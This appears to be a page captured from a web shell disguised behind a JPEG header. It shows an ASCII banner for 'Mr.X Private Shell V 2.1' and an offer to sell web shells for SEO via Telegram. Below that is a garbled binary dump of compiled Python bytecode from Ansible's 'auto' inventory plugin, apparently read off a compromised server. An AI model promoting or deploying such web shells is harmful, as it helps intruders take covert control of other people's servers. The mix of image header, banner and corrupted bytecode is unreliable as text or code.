����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
a
�)g� � @ sX d dl mZmZmZ eZdZdZd dlm Z d dl
mZ d dlm
Z
G dd� de�Zd S )
� )�absolute_import�division�print_functiona[
name: auto
author:
- Matt Davis (@nitzmahone)
version_added: "2.5"
short_description: Loads and executes an inventory plugin specified in a YAML config
description:
- By enabling the C(auto) inventory plugin, any YAML inventory config file with a
C(plugin) key at its root will automatically cause the named plugin to be loaded and executed with that
config. This effectively provides automatic enabling of all installed/accessible inventory plugins.
- To disable this behavior, remove C(auto) from the C(INVENTORY_ENABLED) config element.
z�
# This plugin is not intended for direct use; it is a fallback mechanism for automatic enabling of
# all installed inventory plugins.
)�AnsibleParserError)�BaseInventoryPlugin)�inventory_loaderc s* e Zd ZdZ� fdd�Zddd�Z� ZS )�InventoryModule�autoc s( |� d�s|� d�sdS tt| ��|�S )Nz.ymlz.yamlF)�endswith�superr �verify_file)�self�path�� __class__� �B/usr/lib/python3.9/site-packages/ansible/plugins/inventory/auto.pyr "